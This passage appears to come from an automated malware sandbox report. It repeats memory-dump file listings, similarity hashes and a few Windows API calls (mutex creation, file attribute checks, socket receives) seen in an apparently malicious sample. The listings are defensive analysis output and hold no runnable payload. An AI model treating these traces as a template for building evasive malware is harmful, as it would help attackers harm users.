                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 1e984e83d7f73d26cf5b9832e99f63f692b83fb78e916fe0afb86e66eb1961fe
                                                                                                                                                                                                        • Instruction ID: bb1b0bf87c8a403ae4498a12cab7892723d23b9a32ce60f6267e5304550e0920
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e984e83d7f73d26cf5b9832e99f63f692b83fb78e916fe0afb86e66eb1961fe
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 612176317142009BEB189B6CDD887ECB6A2DF86310F20423DE514ABAD5CBB699C18352
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 616aa1241a7aaba41f709abe32dfc0970812dfa7c449305e171bd1ec6a3bb6f8
                                                                                                                                                                                                        • Instruction ID: 18ac96f1f52c633b8b5d61c966e0d1710bc1614b86e17b497f7d5013193a1207
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 616aa1241a7aaba41f709abe32dfc0970812dfa7c449305e171bd1ec6a3bb6f8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9321423035C1005AEB286B68995E7FC76A1DFC7700F244939E145A6AD3CFB548824293
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,000BD92D,?,?,?,?), ref: 000B86E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 20941cacbcfb78cbb35bcaee4f31c8ce1f51a79dbb185057ef541e1e4ff53281
                                                                                                                                                                                                        • Instruction ID: 5ebab0c29e5a6240a5cb171179761d1e54492919a1571caab53748c3dc105647
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20941cacbcfb78cbb35bcaee4f31c8ce1f51a79dbb185057ef541e1e4ff53281
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CC08C280226001AED1C053C528C0E833484B6B3A82E46B84C1B04A0F1C9759807D314
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,000BD92D,?,?,?,?), ref: 000B86E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: b12caa40fa5c156433e213fca50dd0f9fe9b9ae813938bb99a9b5e0788f3b556
                                                                                                                                                                                                        • Instruction ID: f27d3134aa3beb182b7ef9c6a9e0da284db3154036ecadc604dd9ab753813c7c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b12caa40fa5c156433e213fca50dd0f9fe9b9ae813938bb99a9b5e0788f3b556
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02C08C380222005AEA1C4A2CA28C0A433089F2B3293F05B98C1B14A0F1CAB2C403C764
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269503040358.0000000005290000.00000040.00001000.00020000.00000000.sdmp, Offset: 05290000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5290000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: f9f4d2da1e6c568be573f3fc76a157ccd36dab2a16e950d28026ac2a64080ec3
                                                                                                                                                                                                        • Instruction ID: 641990cb02ac2c0cb8bf1313ff0d66e5b34ee0e37b523a992d01b842d832dbf0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9f4d2da1e6c568be573f3fc76a157ccd36dab2a16e950d28026ac2a64080ec3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F0C2D32A91297C788790A2274CAF3AE6FFDC3A303318427F443D1A02E6C84A4961B0
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269503040358.0000000005290000.00000040.00001000.00020000.00000000.sdmp, Offset: 05290000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5290000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 85b48b57938a013ad4552926f9ca29bf7751529a41276ba76930bbccca017758
                                                                                                                                                                                                        • Instruction ID: 4dfa92d78053d0fb62ba898e5f0f0ad662b34f7590936b83234ca308fcb4dbe2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85b48b57938a013ad4552926f9ca29bf7751529a41276ba76930bbccca017758
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1F05E972B912DBC7486D082279CAF39A2FFDD7A713314423B403D1B02A6D80B5861B1
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • recv.WS2_32(?,?,00000004,00000000), ref: 000BE01B
                                                                                                                                                                                                        • recv.WS2_32(?,?,00000008,00000000), ref: 000BE050
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
